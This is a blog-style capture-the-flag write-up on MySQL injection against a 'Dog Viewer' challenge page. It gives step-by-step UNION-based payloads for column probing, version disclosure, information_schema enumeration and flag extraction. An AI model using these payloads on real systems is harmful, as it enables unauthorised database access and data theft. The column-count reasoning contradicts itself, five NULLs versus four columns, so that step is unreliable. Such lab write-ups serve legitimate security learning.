Sunday, December 24, 2023

(My)SQL Injection Attack [Tutorial]

Imagine you're baking a delicious batch of cookies, following your grandma's secret recipe. But then, a mischievous squirrel sneaks in and replaces a pinch of cinnamon with a dash of…mystery powder! That's kind of like an SQL injection (SQLi) attack. Hackers, like mischievous squirrels, exploit website vulnerabilities by sneaking malicious code into user input fields.

This "mystery powder" can trick the website's database (the oven) into baking something entirely different – maybe stealing your recipe, adding unwanted ingredients, or even burning the whole batch!

Thankfully, website bakers have special tools like data validation and locking cabinets to keep their ovens squirrel-proof and cookies safe. So, next time you trust a website with your information, remember: just like you wouldn't share your grandma's secret recipe with a squirrel, be careful what you input online. Keep your digital cookies safe from sneaky squirrels!

Let's crack open the hood of this website and peek at its inner workings, not to exploit weaknesses but to understand the delicate dance between data and security. Think of it as a friendly spelunking expedition through the code caves, unearthing the hidden tunnels and secret chambers that protect precious information. We'll be explorers, not exploiters, mapping the landscape of potential vulnerabilities so developers can equip their online fortresses with sturdier shields and clever traps (figuratively speaking, of course!). It's all about knowledge, not mischief, and like any good spelunker, we'll emerge with a newfound respect for the intricate systems that keep our digital world humming. So, grab your metaphorical helmet and headlamp, and let's embark on this educational adventure!
In this article, we will exploit this website for Dog Viewer. By default, without entering any ID, it displays Name: Saranac for ID: 1, which we can also get through this URL:

So, let's enter 2 for ID and hit Submit. Now we get a result as Name: Doodle, which can alternatively obtained by this URL: We can enumerate the IDs by incrementing them to 1 every time, and we get valid results for IDs 1, 2, 3, and 4. For invalid IDs like 0, -1, or any values greater than 4, we get 0 results.

Let's begin by checking if it is vulnerable to SQLi attacks. By giving the ID as 1', we get 0 results (

For a query 105 OR 1=1; we get all results. Good progress!!

Now, let's determine the number of columns required to perform the Injection UNION Attack. First, we try 5 queries from 105 ORDER BY 1 -- then 105 ORDER BY 2 -- to 105 ORDER BY 5 -- and get 0 results. Next, we try with the query 105 UNION SELECT NULL, then 105 UNION SELECT NULL, NULL and get 0 results. For the query 105 UNION SELECT NULL, NULL, NULL, NULL, NULL, we get a hit, so we need 4 columns for 4 NULLs.

Now we can extract the version with the query 105 UNION SELECT NULL, NULL, @@VERSION, NULL and get the result as 5.5.58-0ubuntu0.14.04.1.

From the query 105 UNION SELECT NULL, NULL, table_name, NULL FROM information_schema.tables, we get the table name w0w_y0u_f0und_m3 and the query 105 UNION SELECT NULL, NULL, column_name, NULL FROM information_schema.columns gives us the column name f0und_m3.

Finally, to finish our attack, we query the ID field with 105 UNION SELECT NULL, NULL, f0und_m3, NULL FROM w0w_y0u_f0und_m3 and capture the flag as abctf{uni0n_1s_4_gr34t_c0mm4nd} which can be accessed with the following URL:

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.